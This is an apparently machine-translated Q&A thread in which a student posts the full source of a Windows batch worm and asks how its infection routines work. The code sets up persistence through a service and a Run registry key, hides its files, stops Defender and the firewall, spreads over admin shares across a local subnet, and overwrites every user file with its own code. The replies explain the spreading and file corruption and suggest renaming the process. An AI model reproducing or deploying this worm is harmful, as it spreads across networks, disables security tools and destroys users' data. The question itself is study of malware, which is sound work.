@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"
rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
我正在研究我的TCC的恶意软件和恶意程序,我发现了这个批处理蠕虫示例,我可以理解大部分代码,但我无法理解"Infect Network"和"Infect *.* in C:\Users"行。
这些线路对我的电脑有什么作用?它会简单地“感染”文件还是毁掉它们?这种蠕虫会在受害者网络中传播吗?这段代码有什么限制?防病毒如何阻止它?
如果您有一些好的恶意软件/软件工程电子书和论文,请在评论中留下链接。
抱歉发言不好,我用这种语言不流利。
请勿恶意使用此代码!
答案 0 :(得分:2)
“感染网络”部分尝试获取与本地网络IP地址的网络连接,读取系统中的用户列表并将文件复制到其本地启动目录中,以便在登录时运行他们的机器。
感染用户部分将Users目录中的多个文件重命名为.bat扩展名,然后以该名称复制另一个文件。这意味着强制几个文件具有所需.bat文件的内容。这可能会运行其他一些恶意代码或运行先前复制的可执行文件。
如果您需要进一步澄清,请与我们联系。
答案 1 :(得分:0)
。表示感染C:\ users个人资料
中的所有内容答案 2 :(得分:0)
顺便说一下,您可以使用 set 命令 (SET Process=DaMonki) 将“DaMonki”更改为其他任何内容。